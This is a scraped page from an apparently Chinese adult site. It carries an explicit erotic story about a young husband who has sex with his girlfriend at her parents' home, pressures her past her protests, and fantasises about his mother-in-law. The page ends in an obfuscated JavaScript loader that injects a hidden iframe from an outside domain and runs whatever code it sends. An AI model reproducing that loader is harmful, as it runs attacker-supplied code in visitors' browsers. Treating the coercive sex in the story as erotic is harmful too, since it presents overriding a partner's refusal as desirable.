字幕網- 每日更新 永久免費

「老公,我媽讓我們晚上回家吃飯。」

  「那我知道了。」

  就在剛才妻子小靜打了個電話告訴我,讓我晚上去她家吃飯。

  我和小靜在差不多三個月前完成了人生中最重要的決定,那一天我們在所有親朋好友的見證下舉行了婚禮,正式成為了合法夫妻。

  其實我們兩個也不過都是剛踏出校園步入社會沒兩年的小年輕,之所以這幺急著結婚,完全可以說是她肚子那個小東西的原因。隻怪自己圖一時之快,安全措施沒做好,到知道小靜懷孕的那一天已經晚了,所以可以說是奉子成婚。

  在我和小靜還處於男女朋友關係的時候,她就領著我回去見過她的爸媽,她的爸媽人很好,對我也很滿意。有時候我送小靜回來天太晚了,他們就讓我直接住在他們家,對此我也一直心存感激。小靜的父母並不像一般的家長一樣思想封建,對女兒的私人生活嚴防死守,而是采取了一種比較開放的態度,我想小靜的開朗性格也是來源於此。

  本人一直有一個比較特殊的愛好,就是在有人的情況下操女友,這種身心上的刺激有別於一般的性愛。但小靜當時涉世未深,傳統觀念比較重,一直覺得這是不雅的行為,拒絕和我配合,但她的堅持在我這樣的調教高手麵前根本沒太大作用,隻是花言巧語哄騙她嚐試過一次之後,她就開始漸漸迷戀上這種特殊的性愛方式。

  有一次晚上,我們兩個又是出去玩到了很晚才回家,把她送回家的時候,小靜的媽媽就留我住下來,我並沒有假客套,於是順理成章地住了下來。那天小靜的爸爸剛出差去了,家裏隻有小靜和她媽媽,可能她媽媽也是出於家裏有個男人會比較安全的考慮才挽留我的。

  小靜的家很大,有三間房子,據說是當年比較早的時候買的,沒有現在的房價這幺貴。 但不用想也知道,像這樣的三室一廳房子放在什幺年代都不會便宜,這在我和小靜交往的時候就從她的口中得知她的家庭狀況應該是不錯的,由此而來的是她的脾氣也不小。

  平時小靜爸爸在家的時候,我就是住在客房,像現在這種隻有她們母女在家的特殊情況下,我作為還不算是他們一家子的外人更應該懂得避嫌。但小靜似乎並沒有這樣的顧慮,洗完澡以後直接就來了我房間找我玩撲克牌,說等一會兒再回去睡。可我的心思已經完全不在撲克牌上,而是她那剛沐浴完還散發著沐浴露芳香的青春肉體,一時心癢難耐,放下手中的牌一把撲了上去。

  「呀!你幹嘛呀?我媽還在外麵呢!」

  「沒關係啦,反正她又看不見。」

  「不行的!會被發現的。」

  此時欲火焚身的我哪還顧得了這些,強硬地抓著小靜的手腕,不理她的掙紮往她嘴上一頓狂親。 而小靜嬌小的身軀則在我的壓迫下不停地扭動,這種類似強間的代入感給我帶來前所未有的刺激。

  「寶貝兒,你就可憐可憐我吧,都這幺久沒親熱了,乖,我很快就完事。」聽了我的軟聲哀求,小靜終於是不再反抗了:「你輕點,回頭讓我媽發現就糟了,看你以後怎幺辦。 」我心想,孤男寡女共處一室,還是大晚上的,你媽這種過來人會猜不到發生什幺事嗎?

  得到許可之後,廢話也就不說,我快速地脫掉自己的衣褲,還得接著脫小靜的。我有一個愛好,不知道算不算是怪癖,就是一般男女朋友做的次數多了,時間久了,發生事情的時候都特別自然地管自己脫衣服,但我就特別喜歡女生幫我脫衣服,我來脫她的,總覺得跟比自己脫有很大的心理差別。

  麵對全身赤裸的小靜我並沒有急於進入正題,而是打算先把前戲做足了,這一點也一直是小靜很感動和喜歡的地方。不是為了發泄性欲做愛而做愛,而是一場精神和肉體上的無上享受。

  「為什幺會這幺濕呀?」我在小靜的下麵摸了一把,麵帶戲謔地看著她。

  「你討厭!」被發現身體秘密的小靜顯得有些嬌羞。

  「嘴上說不要,身體卻很老實。哈哈哈……」

  「你……你再說,你再說我不理你了。」臉上掛不住的小靜說著就要再度起身穿衣服。我一把又將她摁下不再鬧她,將她的兩腿分開,頭拱了進去用靈活的舌頭開始專心地舔弄起了她的陰核和陰唇。伴隨著我的舌頭每一下挑弄,小靜的身體都要經曆一次顫抖,在我加快速度之後更是用手壓在了我的頭,似乎希望我那舌頭能夠往她的陰道裏鑽進去。

  眼看著前戲準備得差不多了,我二話不說直接提槍上馬,伴隨著溫熱、潮濕的緊密包裹感,已經記不清多少次的又再進入了小靜的體內。

  和小靜在一起這幺多年,我們做愛的次數多得恐怕自己都記不清了,但盡管經曆了這幺多次的蹂躪後,小靜的小穴卻還是和當初我第一次進去時一樣緊得嚇人。有時候我都會忍不住笑話她:「你的小逼這幺緊,將來我們的孩子要出來的話,不是估計得先變成一根繡花針才行?」結果當然是獲得了她的一頓毒打。

  「舒服嗎?」

  「嗯……嗯~~」

  平時我們兩個人在外麵開房過夜的時候,小靜的呻吟都能夠讓隔壁聽見,最有趣的是一次,服務員不停地來敲我們的門,說我們影響了隔壁房客人的休息,而現在為了不被她媽媽發現,硬是忍著不叫卻又有一種別樣的魅力。

  就在我們倆漸入佳境的時候,門外響起了一陣「嘩啦啦」的衝水聲,那是從旁邊的衛生間裏傳來的,應該是小靜的媽媽在上廁所。

  說起我這個嶽母,第一次來小靜家見家長的時候著實被她媽媽驚豔了一把,不說貌若天仙這幺誇張,但確實可說得上是徐娘半老、風韻猶存,尤其是她的皮膚很白皙,比她女兒還要好,身材到了她這個年紀竟然還能保持的這幺勻稱,實在難得。

  上得山多終遇鬼,不知道是不是席間對未來丈母娘的關注太多,以至於後來到小靜房間去休息的時候,被她一句「我媽是不是很好看呀?看這幺久」嚇了一跳,自然是要連忙解釋是她多心,自己根本是正常的注視。

  誰知道她來了一句:「你可別動什幺歪心思,她是我媽,將來也是你媽,連自己的媽媽都不放過,大色狼。」其實在我內心中一直對戀母或者說成熟女性有很深的眷戀,原來對那未來丈母娘還隻是停留在欣賞的階段,被小靜這幺一說,自然而然地就開始往那方麵去想,這幺一想竟然就停不下來了,想著如果真的能夠搞到小靜的媽媽就好了。

  但我嘴裏還是要死不承認:「怎幺會,就是給我天大的膽子我也不敢呀!」「諒你也不敢,哼,再說了你也沒這本事。」

  「這我可不高興了。」

  「不高興?好呀,你有本事就去把我媽搞到手,你要真成了我也沒意見。」小靜略有些賭氣地說著,後麵又是一陣嬉笑打鬧。

  然而過了這幺久的時間,小靜當初不知是真是假的戲言我到現在還記得,有時也在想,真的要是能把母女一起搞到手好像也不錯的樣子,當然這一切也隻是幻想一下就好了,現實生活中恐怕小靜會第一個殺了我。

  而現在正在有節奏地抽插著小靜的我,不知道為什幺腦子裏又再浮現出那一句對話,大腦又忍不住開始往她媽媽那豐滿均勻的身材上幻想,連帶著插在小靜體內的龜頭都感覺大了一圈。

  「呀~~」我下體的變化小靜作為最直接的感受當事人自然也察覺到,有些驚訝又有些羞澀地白了我一眼。

  既然操不到母親,那就操她的女兒好了,我開始將對小靜媽媽的欲望全都用力發泄到了小靜身上,想要在這有些神似的女兒身上找到一絲不可能實現的目標的快感。

  或許是我真的太過大力了吧,原本一直緊咬牙關不叫一聲的小靜也有些承受不了我的衝擊,斷斷續續地發出她那迷人的呻吟聲。對,叫吧叫吧,老子就是要操死你這個騷婆娘,每天穿著短裙把大腿露出來,還不時在勾引我,看我不操死你。

  眼中的小靜開始有些和她媽媽的身影重合起來,這種好似突破倫理的快感一波一波地刺激著我的神經,逼迫著我的老二做出最大限度的衝刺。

  「你……你……慢點,受不了了~~慢點……」正在興頭上的我哪裏能管得了這些,繼續快速的抽插著,直到聽見旁邊廁所的水聲停了,猜到小靜媽媽應該是上完廁所了,也該出來了,那她一定會經過我房間這裏,這樣一來更加地刺激著我猛烈地撞擊小靜的下體。 心裏有一個聲音在誘惑著我:『讓她聽聽她女兒是怎幺被人操的,知道她女兒找了一個多好的男人是多幺的幸福吧!』最後我的大腿和小靜的屁股所產生的「啪啪啪」的撞擊聲,我想隻要不是耳聾的,經過我們的門口都應該會聽到,而我自己也特別留心著外麵的腳步聲。

  此時的小靜簡直要發瘋了,皺著眉頭死命地捂著嘴巴不讓自己發出呻吟來,另一隻手則不停拍打著我的大腿示意我停下來。雖然我很用心地注意著外麵的情況,但還是沒能掌握到小靜媽媽到底有沒有在我門口停留,外麵也一直沒動靜。

  一直過了五、六分鍾,實在是承受不了這幺高頻率的衝刺,在一股熱血上湧後,我的萬千子孫終於也去往了它們最終的歸宿,事後在清理身體的時候被小靜一頓暴打。

  在這之後又過了幾個月才從小靜那裏得知她懷孕的消息,接著就是雙方家長會麵把婚事敲定下來,原來的女朋友也轉正成為了合法妻子。

  在我們結婚之前,雙方父母商量了一下,打算給我們兩個小的在外麵買套房子。這也是我一直在考慮的事情,要想搞定婚後的複雜的婆媳關係,最好的辦法就是讓她們別住在一起。

  原來我的積蓄加上小靜的存款再加上我父母的補貼,也就隻能買一套一居室的房子,但小靜的父母不舍得女兒受苦,偷偷地把自己的積蓄讚助了我們一點。在她父母的口中是一點,但就是這幺一點換來了一套兩室一廳的房子,所以也是在那時候我才深深明白小靜的公主病也不是全沒來由。

  也正是應該這個原因,又過了幾個月小靜肚子漸現的時候,她的媽媽就提議讓小靜搬回家住,讓他們照顧女兒,小靜自然是千百個同意,問我意見的時候,我還能說什幺呢,房子是人家出的錢,而且我也確實不太會照顧孕婦。

  原打算每個星期我去她爸媽那裏看看她就好了,誰想到小靜竟然要求我也一起搬過去住,除了所謂的舍不得我外,她的那點小心思我又怎幺會猜不到。好歹我長得也不賴,大小也是一個主管領導,重要是年紀輕輕就到了這個位置,外麵多少小姑娘對我拋媚眼灌迷魂湯,一個沒忍住隨時會做出出格的事情來。

  就這樣我和小靜搬回了她父母家和他們一起住,雖然已經是一家人了,但多多少少還是有些不太方便,尤其是我這種平時在家邋遢慣了,隨便一件大褲衩、背心就滿屋子走的,到了他們家就全部都得改回來。

  有一次我休息,小靜和姐妹出去了,他父母也不在家,我就在家洗澡洗頭。正在洗頭抹洗發露的時候聽到大門開了,又聽到一陣腳步聲,認出了是小靜,就喊了一句:「老婆,幫我把毛巾拿一下,幫我擦一下脖子,都是泡沫。」小靜走了進來,拿過毛巾幫我擦了擦脖子。

  「後背擦一下,水滴下來了。」

  洗完澡以後我隻穿了一件短褲就開始洗頭了,小靜又很輕柔很仔細地擦拭著我的後背。

  我有些幽怨地說:「老婆,咱倆都多久沒那個了,今晚是不是要……」正等待小靜回覆的時候,身後卻傳來了丈母娘的聲音:「靜雅還沒回來呢!」這句話把我嚇得半死,搞了半天原來是小靜媽媽回來了,還弄了這幺大個烏龍。

  「媽,是你啊,我……我還以為是小靜回來了呢!」小靜媽媽沒說話,又幫我再擦了幾下後背,說了一句讓我早點洗完別著涼,就出去了,留下一個尷尬不已的我。

  真的有時候感覺禍不單行這句話十分準確。 就在當天晚上我上廁所的時候又發生了一件趣事。

  當時小靜爸媽都睡了,我肚子不太舒服就出來上廁所,平時在自己家裏都習慣了上廁所不關門,現在所有人都睡了,自然也就沒顧慮到那幺多,直接開著門就開始方便。

  就在我打算起身的時候,發現門口閃過一道人影,小靜媽媽出現在了廁所門口,兩人都愣了幾秒。直到小靜媽媽將視線往下移,看見了我那還因來不及提起褲子而裸露在外的小弟弟時驚叫了一聲,幸好她及時用手捂住了嘴巴,才沒驚動小靜和我嶽父。

  緊接著我趕緊手忙腳亂地把褲子拉起來,而她則有些慌張地不辨東西的來回走了幾步,快步回到了自己房間。

  小靜父母的寢室裏就有一件衛生間,我是怎幺也沒想到她會出來上廁所,剛才的事情加上早上的尷尬,我一下覺得徹底沒臉見她媽媽,有些慌張地回到自己房間。

  大概實在是太慌亂了,讓小靜都看出來了,就問我:「怎幺了?一副見鬼的樣子。」我看了看小靜,當時也不知道是怎幺想的,直接就把剛剛發生的事故一五一十地告訴了她,或許是希望她去幫我給她媽媽道個歉,但沒考慮到如果小靜真的去了,那情況不是更尷尬了嗎?

  「嘻嘻,這幺說,我媽看見你的小弟弟了。」對我剛才所發生的事情小靜竟然一點生氣也沒有,甚至有點看戲的意思,哪怕其中也牽涉到她的媽媽。

  「你還笑,都快要把我嚇死了。」

  「瞧你,膽子這幺小,我媽都沒說什幺呢,你有什幺好怕的?」「我真的是沒法做人了,發生這樣的事,傳出去還不得被人笑死。」「你不說,我媽不說,誰會知道?」

  「對了,你媽不會告訴你爸吧?」我突然想到。萬一讓我嶽父知道這件事,我會不會被大卸八塊?

  「你以為我媽和你一樣,這幺丟臉的事情還往外說。 放心好了,她肯定是會藏在心裏的。」聽小靜這幺一分析也有些道理,情緒頓時平複了許多。

  「你被我媽看見,嘿嘿嘿,看見那個是什幺感覺呀?」小靜提到關鍵地方大概是想像到那個畫麵實在太好笑了,一邊大笑著一邊問我。

  「什幺感覺?這還能有什幺感覺,我當時就恨不得找個地縫鑽進去我。」「我……哈哈哈,我還以為你……你會受到什幺變態的快感,導致小弟弟變成大弟弟呢!」平時我們兩個除了會在一起看A片學習以外,小靜自己也會找一些黃色小說來看,當時就發現她好像比較鍾情於亂倫題材的小說,問她為什幺,她說是容易代入角色,比較刺激。現在她明顯是把我和那些離譜到不行的黃色小說中的情節聯係到了一起,恨得我壓了上去就想把她就地正法,被她一句「肚子裏還有寶寶呢」給嚇得退了回來。

  「那這樣不是想把我活活憋死嗎?」我無力地說著。

  「我又沒攔著你,你可以自己出去找女人呀!」我沒好氣地白了她一眼。

  小靜嘻嘻笑笑地趴到我身上說:「你說我媽回去會不會瞎想呢?」我雖然不明白小靜話裏的意思,但還是忍不住幻想起來,正值所謂虎狼之年的丈母娘看見了自己女婿的雞巴,徹夜難寐,隻好用手指撫慰心靈的畫麵。

  「噢~~你在想什幺不該想的東西呢?」

  明明是自己把我往那方麵帶,現在又在說我胡思亂想了,但看到她那戲謔的表情就知道小靜又在逗我了。

  【待續】

       字節:11464[ 此帖被幸福女海在2015-11-10 16:08重新編輯 ]

上一篇:Sena Nagakura永倉せな_[58P] 下一篇:前後夾擊十分享受[20P]
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};